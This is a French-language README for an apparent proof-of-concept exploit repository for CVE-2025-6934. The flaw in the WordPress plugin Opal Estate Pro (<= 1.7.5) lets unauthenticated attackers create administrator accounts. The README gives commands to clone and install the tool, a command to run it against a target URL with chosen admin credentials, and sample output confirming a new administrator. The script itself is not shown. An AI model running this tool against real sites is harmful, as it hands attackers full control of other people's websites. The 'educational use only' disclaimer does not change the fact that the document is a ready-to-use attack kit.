
CVE-2025-6934 est une vulnérabilité critique dans le plugin WordPress Opal Estate Pro (<= 1.7.5) qui permet à des attaquants non authentifiés de créer de nouveaux comptes administrateur via le processus d'enregistrement AJAX non sécurisé du plugin.
📖 Description Ce dépôt contient un exploit de preuve de concept (PoC) pour CVE-2025-6934, une vulnérabilité critique dans le plugin WordPress : Opal Estate Pro <= 1.7.5, permettant la création non authentifiée de comptes administrateur.
⚠️ Avertissement : Cet outil est fourni uniquement à des fins éducatives et de recherche en sécurité.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés.
readme.txtClonez le dépôt et installez les dépendances :
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
Exécutez le script avec votre cible :
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ Exemple de sortie :
[✔] Exploit Successful!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator

Gaurav Bhattacharjee (0xgh057r3c0n)
Ce projet est sous licence MIT – voir le fichier LICENSE pour plus de détails.